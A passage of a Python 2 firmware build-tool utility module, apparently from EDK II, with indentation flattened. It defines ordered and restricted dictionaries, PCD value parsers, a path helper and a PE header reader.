self.IsBinary = False
self._Template = Template
self._TemplateSectionList = self._Parse(Template)
## str() operator
#
# @retval string The string replaced
#
def __str__(self):
return self.String
## Split the template string into fragments per the ${BEGIN} and ${END} flags
#
# @retval list A list of TemplateString.Section objects
#
def _Parse(self, Template):
SectionStart = 0
SearchFrom = 0
MatchEnd = 0
PlaceHolderList = []
TemplateSectionList = []
while Template:
MatchObj = gPlaceholderPattern.search(Template, SearchFrom)
if not MatchObj:
if MatchEnd <= len(Template):
TemplateSection = TemplateString.Section(Template[SectionStart:], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
break
MatchString = MatchObj.group(1)
MatchStart = MatchObj.start()
MatchEnd = MatchObj.end()
if MatchString == self._REPEAT_START_FLAG:
if MatchStart > SectionStart:
TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
SectionStart = MatchEnd
PlaceHolderList = []
elif MatchString == self._REPEAT_END_FLAG:
TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
SectionStart = MatchEnd
PlaceHolderList = []
else:
PlaceHolderList.append((MatchString, MatchStart - SectionStart, MatchEnd - SectionStart))
SearchFrom = MatchEnd
return TemplateSectionList
## Replace the string template with dictionary of placeholders and append it to previous one
#
# @param AppendString The string template to append
# @param Dictionary The placeholder dictionaries
#
def Append(self, AppendString, Dictionary=None):
if Dictionary:
SectionList = self._Parse(AppendString)
self.String += "".join([S.Instantiate(Dictionary) for S in SectionList])
else:
self.String += AppendString
## Replace the string template with dictionary of placeholders
#
# @param Dictionary The placeholder dictionaries
#
# @retval str The string replaced with placeholder values
#
def Replace(self, Dictionary=None):
return "".join([S.Instantiate(Dictionary) for S in self._TemplateSectionList])
## Progress indicator class
#
# This class makes use of a thread to print progress on the console.
#
class Progressor:
    # for avoiding an endless loop
_StopFlag = None
_ProgressThread = None
_CheckInterval = 0.25
## Constructor
#
    #   @param OpenMessage  The string printed before progress characters
    #   @param CloseMessage The string printed after progress characters
    #   @param ProgressChar The character used to indicate the progress
    #   @param Interval     The interval in seconds between two progress characters
#
def __init__(self, OpenMessage="", CloseMessage="", ProgressChar='.', Interval=1.0):
self.PromptMessage = OpenMessage
self.CodaMessage = CloseMessage
self.ProgressChar = ProgressChar
self.Interval = Interval
if Progressor._StopFlag == None:
Progressor._StopFlag = threading.Event()
    ## Start to print progress characters
    #
    #   @param OpenMessage  The string printed before progress characters
#
def Start(self, OpenMessage=None):
if OpenMessage != None:
self.PromptMessage = OpenMessage
Progressor._StopFlag.clear()
if Progressor._ProgressThread == None:
Progressor._ProgressThread = threading.Thread(target=self._ProgressThreadEntry)
Progressor._ProgressThread.setDaemon(False)
Progressor._ProgressThread.start()
    ## Stop printing progress characters
    #
    #   @param CloseMessage The string printed after progress characters
#
def Stop(self, CloseMessage=None):
OriginalCodaMessage = self.CodaMessage
if CloseMessage != None:
self.CodaMessage = CloseMessage
self.Abort()
self.CodaMessage = OriginalCodaMessage
## Thread entry method
def _ProgressThreadEntry(self):
sys.stdout.write(self.PromptMessage + " ")
sys.stdout.flush()
TimeUp = 0.0
while not Progressor._StopFlag.isSet():
if TimeUp <= 0.0:
sys.stdout.write(self.ProgressChar)
sys.stdout.flush()
TimeUp = self.Interval
time.sleep(self._CheckInterval)
TimeUp -= self._CheckInterval
sys.stdout.write(" " + self.CodaMessage + "\n")
sys.stdout.flush()
## Abort the progress display
@staticmethod
def Abort():
if Progressor._StopFlag != None:
Progressor._StopFlag.set()
if Progressor._ProgressThread != None:
Progressor._ProgressThread.join()
Progressor._ProgressThread = None
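## Illustrative usage of Progressor (a hedged sketch; the messages are made up):
#  print a dot every second while a long-running task is in flight, then finish
#  with the closing message.
#
#   Progress = Progressor("Processing meta-data", "done!")
#   Progress.Start()
#   # ... long running work ...
#   Progress.Stop()
#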
## A dict which can access its keys and/or values orderly
#
# The class implements a new kind of dict whose keys and values can be
# accessed in the order they were added into the dict. It guarantees the order
# by making use of an internal list to keep a copy of the keys.
#
class sdict(IterableUserDict):
## Constructor
def __init__(self):
IterableUserDict.__init__(self)
self._key_list = []
## [] operator
def __setitem__(self, key, value):
if key not in self._key_list:
self._key_list.append(key)
IterableUserDict.__setitem__(self, key, value)
## del operator
def __delitem__(self, key):
self._key_list.remove(key)
IterableUserDict.__delitem__(self, key)
## used in "for k in dict" loop to ensure the correct order
def __iter__(self):
return self.iterkeys()
## len() support
def __len__(self):
return len(self._key_list)
## "in" test support
def __contains__(self, key):
return key in self._key_list
## indexof support
def index(self, key):
return self._key_list.index(key)
## insert support
def insert(self, key, newkey, newvalue, order):
index = self._key_list.index(key)
if order == 'BEFORE':
self._key_list.insert(index, newkey)
IterableUserDict.__setitem__(self, newkey, newvalue)
elif order == 'AFTER':
self._key_list.insert(index + 1, newkey)
IterableUserDict.__setitem__(self, newkey, newvalue)
## append support
def append(self, sdict):
for key in sdict:
if key not in self._key_list:
self._key_list.append(key)
IterableUserDict.__setitem__(self, key, sdict[key])
def has_key(self, key):
return key in self._key_list
## Empty the dict
def clear(self):
self._key_list = []
IterableUserDict.clear(self)
## Return a copy of keys
def keys(self):
keys = []
for key in self._key_list:
keys.append(key)
return keys
## Return a copy of values
def values(self):
values = []
for key in self._key_list:
values.append(self[key])
return values
## Return a copy of (key, value) list
def items(self):
items = []
for key in self._key_list:
items.append((key, self[key]))
return items
## Iteration support
def iteritems(self):
return iter(self.items())
    ## Keys iteration support
def iterkeys(self):
return iter(self.keys())
    ## Values iteration support
def itervalues(self):
return iter(self.values())
## Return value related to a key, and remove the (key, value) from the dict
def pop(self, key, *dv):
value = None
if key in self._key_list:
value = self[key]
self.__delitem__(key)
        elif len(dv) != 0:
            value = dv[0]
return value
## Return (key, value) pair, and remove the (key, value) from the dict
def popitem(self):
key = self._key_list[-1]
value = self[key]
self.__delitem__(key)
return key, value
def update(self, dict=None, **kwargs):
if dict != None:
for k, v in dict.items():
self[k] = v
if len(kwargs):
for k, v in kwargs.items():
self[k] = v
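## Illustrative behaviour of sdict (a hedged sketch): unlike a plain dict on
#  Python 2, keys(), values() and iteration follow insertion order.
#
#   OrderedSettings = sdict()
#   OrderedSettings['TARGET'] = 'DEBUG'
#   OrderedSettings['ARCH'] = 'X64'
#   OrderedSettings.keys()   # -> ['TARGET', 'ARCH']
#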
## Dictionary with restricted keys
#
class rdict(dict):
## Constructor
def __init__(self, KeyList):
for Key in KeyList:
dict.__setitem__(self, Key, "")
## []= operator
def __setitem__(self, key, value):
if key not in self:
EdkLogger.error("RestrictedDict", ATTRIBUTE_SET_FAILURE, "Key [%s] is not allowed" % key,
ExtraData=", ".join(dict.keys(self)))
dict.__setitem__(self, key, value)
## =[] operator
def __getitem__(self, key):
if key not in self:
return ""
return dict.__getitem__(self, key)
## del operator
def __delitem__(self, key):
EdkLogger.error("RestrictedDict", ATTRIBUTE_ACCESS_DENIED, ExtraData="del")
## Empty the dict
def clear(self):
for Key in self:
self.__setitem__(Key, "")
## Return value related to a key, and remove the (key, value) from the dict
def pop(self, key, *dv):
EdkLogger.error("RestrictedDict", ATTRIBUTE_ACCESS_DENIED, ExtraData="pop")
## Return (key, value) pair, and remove the (key, value) from the dict
def popitem(self):
EdkLogger.error("RestrictedDict", ATTRIBUTE_ACCESS_DENIED, ExtraData="popitem")
## Dictionary using prioritized list as key
#
class tdict:
_ListType = type([])
_TupleType = type(())
_Wildcard = 'COMMON'
_ValidWildcardList = ['COMMON', 'DEFAULT', 'ALL', '*', 'PLATFORM']
def __init__(self, _Single_=False, _Level_=2):
self._Level_ = _Level_
self.data = {}
self._Single_ = _Single_
# =[] operator
def __getitem__(self, key):
KeyType = type(key)
RestKeys = None
if KeyType == self._ListType or KeyType == self._TupleType:
FirstKey = key[0]
if len(key) > 1:
RestKeys = key[1:]
elif self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_-1)]
else:
FirstKey = key
if self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_-1)]
if FirstKey == None or str(FirstKey).upper() in self._ValidWildcardList:
FirstKey = self._Wildcard
if self._Single_:
return self._GetSingleValue(FirstKey, RestKeys)
else:
return self._GetAllValues(FirstKey, RestKeys)
def _GetSingleValue(self, FirstKey, RestKeys):
Value = None
#print "%s-%s" % (FirstKey, self._Level_) ,
if self._Level_ > 1:
if FirstKey == self._Wildcard:
if FirstKey in self.data:
Value = self.data[FirstKey][RestKeys]
if Value == None:
for Key in self.data:
Value = self.data[Key][RestKeys]
if Value != None: break
else:
if FirstKey in self.data:
Value = self.data[FirstKey][RestKeys]
if Value == None and self._Wildcard in self.data:
#print "Value=None"
Value = self.data[self._Wildcard][RestKeys]
else:
if FirstKey == self._Wildcard:
if FirstKey in self.data:
Value = self.data[FirstKey]
if Value == None:
for Key in self.data:
Value = self.data[Key]
if Value != None: break
else:
if FirstKey in self.data:
Value = self.data[FirstKey]
elif self._Wildcard in self.data:
Value = self.data[self._Wildcard]
return Value
def _GetAllValues(self, FirstKey, RestKeys):
Value = []
if self._Level_ > 1:
if FirstKey == self._Wildcard:
for Key in self.data:
Value += self.data[Key][RestKeys]
else:
if FirstKey in self.data:
Value += self.data[FirstKey][RestKeys]
if self._Wildcard in self.data:
Value += self.data[self._Wildcard][RestKeys]
else:
if FirstKey == self._Wildcard:
for Key in self.data:
Value.append(self.data[Key])
else:
if FirstKey in self.data:
Value.append(self.data[FirstKey])
if self._Wildcard in self.data:
Value.append(self.data[self._Wildcard])
return Value
## []= operator
def __setitem__(self, key, value):
KeyType = type(key)
RestKeys = None
if KeyType == self._ListType or KeyType == self._TupleType:
FirstKey = key[0]
if len(key) > 1:
RestKeys = key[1:]
else:
RestKeys = [self._Wildcard for i in range(0, self._Level_-1)]
else:
FirstKey = key
if self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_-1)]
if FirstKey in self._ValidWildcardList:
FirstKey = self._Wildcard
if FirstKey not in self.data and self._Level_ > 0:
self.data[FirstKey] = tdict(self._Single_, self._Level_ - 1)
if self._Level_ > 1:
self.data[FirstKey][RestKeys] = value
else:
self.data[FirstKey] = value
def SetGreedyMode(self):
self._Single_ = False
if self._Level_ > 1:
for Key in self.data:
self.data[Key].SetGreedyMode()
def SetSingleMode(self):
self._Single_ = True
if self._Level_ > 1:
for Key in self.data:
self.data[Key].SetSingleMode()
def GetKeys(self, KeyIndex=0):
assert KeyIndex >= 0
if KeyIndex == 0:
return set(self.data.keys())
else:
keys = set()
for Key in self.data:
keys |= self.data[Key].GetKeys(KeyIndex - 1)
return keys
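## Illustrative behaviour of tdict (a hedged sketch): a two-level dict keyed by
#  (arch, name) where 'COMMON' acts as a wildcard fallback.
#
#   Pcds = tdict(True, 2)            # single-value mode, two key levels
#   Pcds['COMMON', 'MyPcd'] = 0
#   Pcds['IA32', 'MyPcd'] = 1
#   Pcds['IA32', 'MyPcd']            # -> 1 (exact arch match wins)
#   Pcds['X64', 'MyPcd']             # -> 0 (falls back to the COMMON wildcard)
#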
## Boolean chain list
#
class Blist(UserList):
def __init__(self, initlist=None):
UserList.__init__(self, initlist)
def __setitem__(self, i, item):
if item not in [True, False]:
if item == 0:
item = False
else:
item = True
self.data[i] = item
def _GetResult(self):
Value = True
for item in self.data:
Value &= item
return Value
Result = property(_GetResult)
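## Illustrative behaviour of Blist (a hedged sketch): assigned items are coerced
#  to booleans and Result is the logical AND over the whole list.
#
#   Flags = Blist([True, True, True])
#   Flags[1] = 0          # coerced to False
#   Flags.Result          # -> False
#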
def ParseConsoleLog(Filename):
Opr = open(os.path.normpath(Filename), 'r')
Opw = open(os.path.normpath(Filename + '.New'), 'w+')
for Line in Opr.readlines():
if Line.find('.efi') > -1:
Line = Line[Line.rfind(' ') : Line.rfind('.efi')].strip()
Opw.write('%s\n' % Line)
Opr.close()
Opw.close()
## AnalyzeDscPcd
#
# Analyze DSC PCD value, since there is no data type info in DSC
#  This function is used to match the functions (AnalyzePcdData, AnalyzeHiiPcdData, AnalyzeVpdPcdData) used for retrieving PCD values from the database
# 1. Feature flag: TokenSpace.PcdCName|PcdValue
# 2. Fix and Patch:TokenSpace.PcdCName|PcdValue[|MaxSize]
# 3. Dynamic default:
# TokenSpace.PcdCName|PcdValue[|VOID*[|MaxSize]]
# TokenSpace.PcdCName|PcdValue
# 4. Dynamic VPD:
# TokenSpace.PcdCName|VpdOffset[|VpdValue]
# TokenSpace.PcdCName|VpdOffset[|MaxSize[|VpdValue]]
# 5. Dynamic HII:
#     TokenSpace.PcdCName|HiiString|VariableGuid|VariableOffset[|HiiValue]
#  The PCD value needs to be located in such a string, and the PCD value might be an expression
#    in which the "|" operator can appear, as it can inside a quoted string value.
#
#  @param Setting:  String containing the information described above, with "TokenSpace.PcdCName|" stripped
#  @param PcdType:  PCD type: feature, fixed, dynamic default, VPD, HII
#  @param DataType: The datum type of the PCD: VOID*, UINT, BOOL
#  @retval:
#    ValueList: A list containing the fields described above
#    IsValid:   True if the setting conforms to the formats above, otherwise False
# Index: The index where PcdValue is in ValueList
#
def AnalyzeDscPcd(Setting, PcdType, DataType=''):
Setting = Setting.strip()
# There might be escaped quote in a string: \", \\\"
Data = Setting.replace('\\\\', '//').replace('\\\"', '\\\'')
# There might be '|' in string and in ( ... | ... ), replace it with '-'
NewStr = ''
InStr = False
Pair = 0
for ch in Data:
if ch == '"':
InStr = not InStr
elif ch == '(' and not InStr:
Pair += 1
elif ch == ')' and not InStr:
Pair -= 1
if (Pair > 0 or InStr) and ch == TAB_VALUE_SPLIT:
NewStr += '-'
else:
NewStr += ch
FieldList = []
StartPos = 0
while True:
Pos = NewStr.find(TAB_VALUE_SPLIT, StartPos)
if Pos < 0:
FieldList.append(Setting[StartPos:].strip())
break
FieldList.append(Setting[StartPos:Pos].strip())
StartPos = Pos + 1
IsValid = True
if PcdType in (MODEL_PCD_FIXED_AT_BUILD, MODEL_PCD_PATCHABLE_IN_MODULE, MODEL_PCD_FEATURE_FLAG):
Value = FieldList[0]
Size = ''
if len(FieldList) > 1:
Type = FieldList[1]
# Fix the PCD type when no DataType input
if Type == 'VOID*':
DataType = 'VOID*'
else:
Size = FieldList[1]
if len(FieldList) > 2:
Size = FieldList[2]
if DataType == 'VOID*':
IsValid = (len(FieldList) <= 3)
else:
IsValid = (len(FieldList) <= 1)
return [Value, '', Size], IsValid, 0
elif PcdType in (MODEL_PCD_DYNAMIC_DEFAULT, MODEL_PCD_DYNAMIC_EX_DEFAULT):
Value = FieldList[0]
Size = Type = ''
if len(FieldList) > 1:
Type = FieldList[1]
else:
Type = DataType
if len(FieldList) > 2:
Size = FieldList[2]
else:
if Type == 'VOID*':
if Value.startswith("L"):
Size = str((len(Value)- 3 + 1) * 2)
elif Value.startswith("{"):
Size = str(len(Value.split(",")))
else:
Size = str(len(Value) -2 + 1 )
if DataType == 'VOID*':
IsValid = (len(FieldList) <= 3)
else:
IsValid = (len(FieldList) <= 1)
return [Value, Type, Size], IsValid, 0
elif PcdType in (MODEL_PCD_DYNAMIC_VPD, MODEL_PCD_DYNAMIC_EX_VPD):
VpdOffset = FieldList[0]
Value = Size = ''
if not DataType == 'VOID*':
if len(FieldList) > 1:
Value = FieldList[1]
else:
if len(FieldList) > 1:
Size = FieldList[1]
if len(FieldList) > 2:
Value = FieldList[2]
if DataType == 'VOID*':
IsValid = (len(FieldList) <= 3)
else:
IsValid = (len(FieldList) <= 2)
return [VpdOffset, Size, Value], IsValid, 2
elif PcdType in (MODEL_PCD_DYNAMIC_HII, MODEL_PCD_DYNAMIC_EX_HII):
HiiString = FieldList[0]
Guid = Offset = Value = ''
if len(FieldList) > 1:
Guid = FieldList[1]
if len(FieldList) > 2:
Offset = FieldList[2]
if len(FieldList) > 3:
Value = FieldList[3]
IsValid = (3 <= len(FieldList) <= 4)
return [HiiString, Guid, Offset, Value], IsValid, 3
return [], False, 0
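## Illustrative parses (a hedged sketch; the MODEL_PCD_* constants come from the
#  imported CommonDataClass.DataClass, and the variable/GUID names are made up):
#
#   AnalyzeDscPcd('TRUE', MODEL_PCD_FEATURE_FLAG)
#   # -> (['TRUE', '', ''], True, 0)
#   AnalyzeDscPcd('L"Setup"|gSetupVariableGuid|0x0|1', MODEL_PCD_DYNAMIC_HII)
#   # -> (['L"Setup"', 'gSetupVariableGuid', '0x0', '1'], True, 3)
#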
## AnalyzePcdData
#
# Analyze the pcd Value, Datum type and TokenNumber.
# Used to avoid split issues when the value string contains the "|" character
#
# @param[in] Setting:  A string containing value/datum type/token number information;
#
# @retval   ValueList: A list containing value, datum type and token number.
#
def AnalyzePcdData(Setting):
ValueList = ['', '', '']
ValueRe = re.compile(r'^\s*L?\".*\|.*\"')
PtrValue = ValueRe.findall(Setting)
ValueUpdateFlag = False
if len(PtrValue) >= 1:
Setting = re.sub(ValueRe, '', Setting)
ValueUpdateFlag = True
TokenList = Setting.split(TAB_VALUE_SPLIT)
ValueList[0:len(TokenList)] = TokenList
if ValueUpdateFlag:
ValueList[0] = PtrValue[0]
return ValueList
## AnalyzeHiiPcdData
#
# Analyze the pcd Value, variable name, variable Guid and variable offset.
# Used to avoid split issues when the value string contains the "|" character
#
# @param[in] Setting:  A string containing VariableName, VariableGuid, VariableOffset, DefaultValue information;
#
# @retval   ValueList: A list containing VariableName, VariableGuid, VariableOffset, DefaultValue.
#
def AnalyzeHiiPcdData(Setting):
ValueList = ['', '', '', '']
TokenList = GetSplitValueList(Setting)
ValueList[0:len(TokenList)] = TokenList
return ValueList
## AnalyzeVpdPcdData
#
# Analyze the vpd pcd VpdOffset, MaxDatumSize and InitialValue.
# Used to avoid split issues when the value string contains the "|" character
#
# @param[in] Setting:  A string containing VpdOffset/MaxDatumSize/InitialValue information;
#
# @retval   ValueList: A list containing VpdOffset, MaxDatumSize and InitialValue.
#
def AnalyzeVpdPcdData(Setting):
ValueList = ['', '', '']
ValueRe = re.compile(r'\s*L?\".*\|.*\"\s*$')
PtrValue = ValueRe.findall(Setting)
ValueUpdateFlag = False
if len(PtrValue) >= 1:
Setting = re.sub(ValueRe, '', Setting)
ValueUpdateFlag = True
TokenList = Setting.split(TAB_VALUE_SPLIT)
ValueList[0:len(TokenList)] = TokenList
if ValueUpdateFlag:
ValueList[2] = PtrValue[0]
return ValueList
## Check the format of a PCD value against its datum type
#
# For PCD value setting
#
def CheckPcdDatum(Type, Value):
if Type == "VOID*":
ValueRe = re.compile(r'\s*L?\".*\"\s*$')
if not (((Value.startswith('L"') or Value.startswith('"')) and Value.endswith('"'))
or (Value.startswith('{') and Value.endswith('}'))
):
return False, "Invalid value [%s] of type [%s]; must be in the form of {...} for array"\
", or \"...\" for string, or L\"...\" for unicode string" % (Value, Type)
elif ValueRe.match(Value):
# Check the chars in UnicodeString or CString is printable
if Value.startswith("L"):
Value = Value[2:-1]
else:
Value = Value[1:-1]
Printset = set(string.printable)
Printset.remove(TAB_PRINTCHAR_VT)
Printset.add(TAB_PRINTCHAR_BS)
Printset.add(TAB_PRINTCHAR_NUL)
if not set(Value).issubset(Printset):
PrintList = list(Printset)
PrintList.sort()
return False, "Invalid PCD string value of type [%s]; must be printable chars %s." % (Type, PrintList)
elif Type == 'BOOLEAN':
if Value not in ['TRUE', 'True', 'true', '0x1', '0x01', '1', 'FALSE', 'False', 'false', '0x0', '0x00', '0']:
return False, "Invalid value [%s] of type [%s]; must be one of TRUE, True, true, 0x1, 0x01, 1"\
", FALSE, False, false, 0x0, 0x00, 0" % (Value, Type)
elif Type in [TAB_UINT8, TAB_UINT16, TAB_UINT32, TAB_UINT64]:
try:
Value = long(Value, 0)
except:
return False, "Invalid value [%s] of type [%s];"\
" must be a hexadecimal, decimal or octal in C language format." % (Value, Type)
else:
return False, "Invalid type [%s]; must be one of VOID*, BOOLEAN, UINT8, UINT16, UINT32, UINT64." % (Type)
return True, ""
## Split command line option string to list
#
# subprocess.Popen needs the args to be a sequence. Otherwise there are problems
# launching commands on non-Windows platforms.
#
def SplitOption(OptionString):
OptionList = []
LastChar = " "
OptionStart = 0
QuotationMark = ""
for Index in range(0, len(OptionString)):
CurrentChar = OptionString[Index]
if CurrentChar in ['"', "'"]:
if QuotationMark == CurrentChar:
QuotationMark = ""
elif QuotationMark == "":
QuotationMark = CurrentChar
continue
elif QuotationMark:
continue
if CurrentChar in ["/", "-"] and LastChar in [" ", "\t", "\r", "\n"]:
if Index > OptionStart:
OptionList.append(OptionString[OptionStart:Index-1])
OptionStart = Index
LastChar = CurrentChar
OptionList.append(OptionString[OptionStart:])
return OptionList
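## Illustrative split (a hedged sketch): each option keeps its own value, so the
#  resulting list can be handed to subprocess.Popen as a sequence.
#
#   SplitOption("-a IA32 -b X64")    # -> ['-a IA32', '-b X64']
#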
def CommonPath(PathList):
P1 = min(PathList).split(os.path.sep)
P2 = max(PathList).split(os.path.sep)
for Index in xrange(min(len(P1), len(P2))):
if P1[Index] != P2[Index]:
return os.path.sep.join(P1[:Index])
return os.path.sep.join(P1)
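## Illustrative result (a hedged sketch, shown with POSIX-style separators; the
#  actual result depends on os.path.sep): the longest common leading directory.
#
#   CommonPath(['/work/edk2/MdePkg/Include', '/work/edk2/MdeModulePkg'])
#   # -> '/work/edk2'
#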
#
# Convert string to C format array
#
def ConvertStringToByteArray(Value):
Value = Value.strip()
if not Value:
return None
if Value[0] == '{':
if not Value.endswith('}'):
return None
Value = Value.replace(' ', '').replace('{', '').replace('}', '')
ValFields = Value.split(',')
try:
for Index in range(len(ValFields)):
ValFields[Index] = str(int(ValFields[Index], 0))
except ValueError:
return None
Value = '{' + ','.join(ValFields) + '}'
return Value
Unicode = False
if Value.startswith('L"'):
if not Value.endswith('"'):
return None
Value = Value[1:]
Unicode = True
elif not Value.startswith('"') or not Value.endswith('"'):
return None
Value = eval(Value) # translate escape character
NewValue = '{'
for Index in range(0,len(Value)):
if Unicode:
NewValue = NewValue + str(ord(Value[Index]) % 0x10000) + ','
else:
NewValue = NewValue + str(ord(Value[Index]) % 0x100) + ','
Value = NewValue + '0}'
return Value
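## Illustrative conversions (a hedged sketch): quoted strings become
#  NUL-terminated decimal byte arrays, and existing {...} arrays are
#  normalized to decimal.
#
#   ConvertStringToByteArray('"AB"')           # -> '{65,66,0}'
#   ConvertStringToByteArray('{0x01, 0x02}')   # -> '{1,2}'
#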
class PathClass(object):
def __init__(self, File='', Root='', AlterRoot='', Type='', IsBinary=False,
Arch='COMMON', ToolChainFamily='', Target='', TagName='', ToolCode=''):
self.Arch = Arch
self.File = str(File)
if os.path.isabs(self.File):
self.Root = ''
self.AlterRoot = ''
else:
self.Root = str(Root)
self.AlterRoot = str(AlterRoot)
# Remove any '.' and '..' in path
if self.Root:
self.Path = os.path.normpath(os.path.join(self.Root, self.File))
self.Root = os.path.normpath(CommonPath([self.Root, self.Path]))
# eliminate the side-effect of 'C:'
if self.Root[-1] == ':':
self.Root += os.path.sep
# file path should not start with path separator
if self.Root[-1] == os.path.sep:
self.File = self.Path[len(self.Root):]
else:
self.File = self.Path[len(self.Root)+1:]
else:
self.Path = os.path.normpath(self.File)
self.SubDir, self.Name = os.path.split(self.File)
self.BaseName, self.Ext = os.path.splitext(self.Name)
if self.Root:
if self.SubDir:
self.Dir = os.path.join(self.Root, self.SubDir)
else:
self.Dir = self.Root
else:
self.Dir = self.SubDir
if IsBinary:
self.Type = Type
else:
self.Type = self.Ext.lower()
self.IsBinary = IsBinary
self.Target = Target
self.TagName = TagName
self.ToolCode = ToolCode
self.ToolChainFamily = ToolChainFamily
self._Key = None
## Convert the object of this class to a string
#
# Convert member Path of the class to a string
#
# @retval string Formatted String
#
def __str__(self):
return self.Path
## Override __eq__ function
#
# Check whether PathClass are the same
#
# @retval False The two PathClass are different
# @retval True The two PathClass are the same
#
def __eq__(self, Other):
if type(Other) == type(self):
return self.Path == Other.Path
else:
return self.Path == str(Other)
## Override __cmp__ function
#
    # Customize the comparison operation of two PathClass objects
    #
    # @retval 0     The two PathClass are the same
    # @retval -1    The first PathClass is less than the second PathClass
    # @retval 1     The first PathClass is bigger than the second PathClass
def __cmp__(self, Other):
if type(Other) == type(self):
OtherKey = Other.Path
else:
OtherKey = str(Other)
SelfKey = self.Path
if SelfKey == OtherKey:
return 0
elif SelfKey > OtherKey:
return 1
else:
return -1
## Override __hash__ function
#
# Use Path as key in hash table
#
# @retval string Key for hash table
#
def __hash__(self):
return hash(self.Path)
def _GetFileKey(self):
if self._Key == None:
self._Key = self.Path.upper() # + self.ToolChainFamily + self.TagName + self.ToolCode + self.Target
return self._Key
def _GetTimeStamp(self):
return os.stat(self.Path)[8]
def Validate(self, Type='', CaseSensitive=True):
if GlobalData.gCaseInsensitive:
CaseSensitive = False
if Type and Type.lower() != self.Type:
return FILE_TYPE_MISMATCH, '%s (expect %s but got %s)' % (self.File, Type, self.Type)
RealFile, RealRoot = RealPath2(self.File, self.Root, self.AlterRoot)
if not RealRoot and not RealFile:
RealFile = self.File
if self.AlterRoot:
RealFile = os.path.join(self.AlterRoot, self.File)
elif self.Root:
RealFile = os.path.join(self.Root, self.File)
return FILE_NOT_FOUND, os.path.join(self.AlterRoot, RealFile)
ErrorCode = 0
ErrorInfo = ''
if RealRoot != self.Root or RealFile != self.File:
if CaseSensitive and (RealFile != self.File or (RealRoot != self.Root and RealRoot != self.AlterRoot)):
ErrorCode = FILE_CASE_MISMATCH
ErrorInfo = self.File + '\n\t' + RealFile + " [in file system]"
self.SubDir, self.Name = os.path.split(RealFile)
self.BaseName, self.Ext = os.path.splitext(self.Name)
if self.SubDir:
self.Dir = os.path.join(RealRoot, self.SubDir)
else:
self.Dir = RealRoot
self.File = RealFile
self.Root = RealRoot
self.Path = os.path.join(RealRoot, RealFile)
return ErrorCode, ErrorInfo
Key = property(_GetFileKey)
TimeStamp = property(_GetTimeStamp)
## Parse PE image to get the required PE information.
#
class PeImageClass():
## Constructor
#
    #  @param PeFile  File path of the PE image
#
def __init__(self, PeFile):
self.FileName = PeFile
self.IsValid = False
self.Size = 0
self.EntryPoint = 0
self.SectionAlignment = 0
self.SectionHeaderList = []
self.ErrorInfo = ''
try:
PeObject = open(PeFile, 'rb')
except:
self.ErrorInfo = self.FileName + ' can not be found\n'
return
# Read DOS header
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x3E)
ByteList = ByteArray.tolist()
# DOS signature should be 'MZ'
if self._ByteListToStr (ByteList[0x0:0x2]) != 'MZ':
self.ErrorInfo = self.FileName + ' has no valid DOS signature MZ'
return
# Read 4 byte PE Signature
PeOffset = self._ByteListToInt(ByteList[0x3C:0x3E])
PeObject.seek(PeOffset)
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 4)
# PE signature should be 'PE\0\0'
if ByteArray.tostring() != 'PE\0\0':
self.ErrorInfo = self.FileName + ' has no valid PE signature PE00'
return
# Read PE file header
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x14)
ByteList = ByteArray.tolist()
SecNumber = self._ByteListToInt(ByteList[0x2:0x4])
if SecNumber == 0:
self.ErrorInfo = self.FileName + ' has no section header'
return
# Read PE optional header
OptionalHeaderSize = self._ByteListToInt(ByteArray[0x10:0x12])
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, OptionalHeaderSize)
ByteList = ByteArray.tolist()
self.EntryPoint = self._ByteListToInt(ByteList[0x10:0x14])
self.SectionAlignment = self._ByteListToInt(ByteList[0x20:0x24])
self.Size = self._ByteListToInt(ByteList[0x38:0x3C])
# Read each Section Header
for Index in range(SecNumber):
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x28)
ByteList = ByteArray.tolist()
SecName = self._ByteListToStr(ByteList[0:8])
SecVirtualSize = self._ByteListToInt(ByteList[8:12])
SecRawAddress = self._ByteListToInt(ByteList[20:24])
SecVirtualAddress = self._ByteListToInt(ByteList[12:16])
self.SectionHeaderList.append((SecName, SecVirtualAddress, SecRawAddress, SecVirtualSize))
self.IsValid = True
PeObject.close()
def _ByteListToStr(self, ByteList):
String = ''
for index in range(len(ByteList)):
if ByteList[index] == 0:
break
String += chr(ByteList[index])
return String
def _ByteListToInt(self, ByteList):
Value = 0
for index in range(len(ByteList) - 1, -1, -1):
Value = (Value << 8) | int(ByteList[index])
return Value
class SkuClass():
DEFAULT = 0
SINGLE = 1
MULTIPLE =2
def __init__(self,SkuIdentifier='', SkuIds={}):
self.AvailableSkuIds = sdict()
self.SkuIdSet = []
if SkuIdentifier == '' or SkuIdentifier is None:
self.SkuIdSet = ['DEFAULT']
elif SkuIdentifier == 'ALL':
self.SkuIdSet = SkuIds.keys()
else:
r = SkuIdentifier.split('|')
self.SkuIdSet=[r[k].strip() for k in range(len(r))]
if len(self.SkuIdSet) == 2 and 'DEFAULT' in self.SkuIdSet and SkuIdentifier != 'ALL':
self.SkuIdSet.remove('DEFAULT')
for each in self.SkuIdSet:
if each in SkuIds:
self.AvailableSkuIds[each] = SkuIds[each]
else:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData="SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
% (each, " ".join(SkuIds.keys())))
def __SkuUsageType(self):
if len(self.SkuIdSet) == 1:
if self.SkuIdSet[0] == 'DEFAULT':
return SkuClass.DEFAULT
else:
return SkuClass.SINGLE
else:
return SkuClass.MULTIPLE
def __GetAvailableSkuIds(self):
return self.AvailableSkuIds
def __GetSystemSkuID(self):
if self.__SkuUsageType() == SkuClass.SINGLE:
return self.SkuIdSet[0]
else:
return 'DEFAULT'
SystemSkuId = property(__GetSystemSkuID)
AvailableSkuIdSet = property(__GetAvailableSkuIds)
SkuUsageType = property(__SkuUsageType)
##
#
# This acts like the main() function for the script, unless it is 'import'ed into another
# script.
#
if __name__ == '__main__':
pass
|
prepro.py
|
